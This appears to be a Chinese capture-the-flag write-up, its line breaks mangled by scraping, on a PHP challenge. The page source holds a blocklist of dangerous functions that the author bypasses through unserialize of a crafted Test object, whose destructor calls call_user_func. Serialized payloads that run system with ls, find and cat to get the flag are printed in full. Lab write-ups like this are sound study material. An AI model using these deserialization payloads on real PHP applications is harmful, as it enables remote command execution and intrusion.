file_get_contents
文件读取函数,call_user_func($func,$p)
命令执行函数使用,代码审计,反序列化利用,linux
查找文件的命令
input
标签提交内容date
函数命令执行,难怪界面会弹出date()
了。尝试修改参数内容,执行paylaod:func=system&p=ls
,发现页面回显hacker
。果然不会这么简单的就能执行命令执行函数file_get_contents
常函数没被过滤。尝试读取flag
没能成功。 <?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p);
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die("Hacker...");
}
}
?>
gettime
函数,发现可以调用call_user_func($func, $p)
,该函数可以进行命令执行,参数$func
代表函数名,参数$p
代表函数的参数。接下来gettype()
判断参数的类型,是字符串类型就返回结果 function gettime($func, $p) {
$result = call_user_func($func, $p);
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
Test
类,发现有p
和func
两个参数,而且调用该类还会执行__destruct()
魔术方法,改魔术方法会调用gettime
函数,而且进行反序列化的话参数还是可控的 class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$disable_fun
变量中的,就会返回haker
,否则就调用gettime
函数,而且参数也可控,只是这黑名单函数够多的,命令执行的函数都给过滤了应该 $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die("Hacker...");
}
}
func
变量赋值为存在在黑名单的命令执行函数system
,给p
赋值命令执行参数,即可通过析构魔术方法调用gettime
函数,实现任意命令执行。根据思路构建序列化字符串,通过burp
进行发送,成功回显了目录文件
class Test {
var $p = "ls";
var $func = "system";
}
$flag=new Test();
echo serialize($flag);
?>
O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}
flag
文件,只好执行find
命令,搜索flag
文件名了,为了搜索内容过多,先尝试搜索以fla
开头的文件,更改p
变量的值,构建序列化字符串O:4:"Test":2:{s:1:"p";s:70:"find / -name fla* -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null";s:4:"func";s:6:"system";}
。响应过程有点慢。发现可以文件/tmp/flagoefiu4r93
p
变量的值,使用cat
命令查看该文件内容,发现就是flag
,成功拿下func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}
func=file_get_contents&p=index.php
<?php
class Test {
var $p = "ls";
var $func = "system";
}
$flag=new Test();
echo serialize($flag);
?>
O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}
O:4:"Test":2:{s:1:"p";s:70:"find / -name fla* -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null";s:4:"func";s:6:"system";}
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}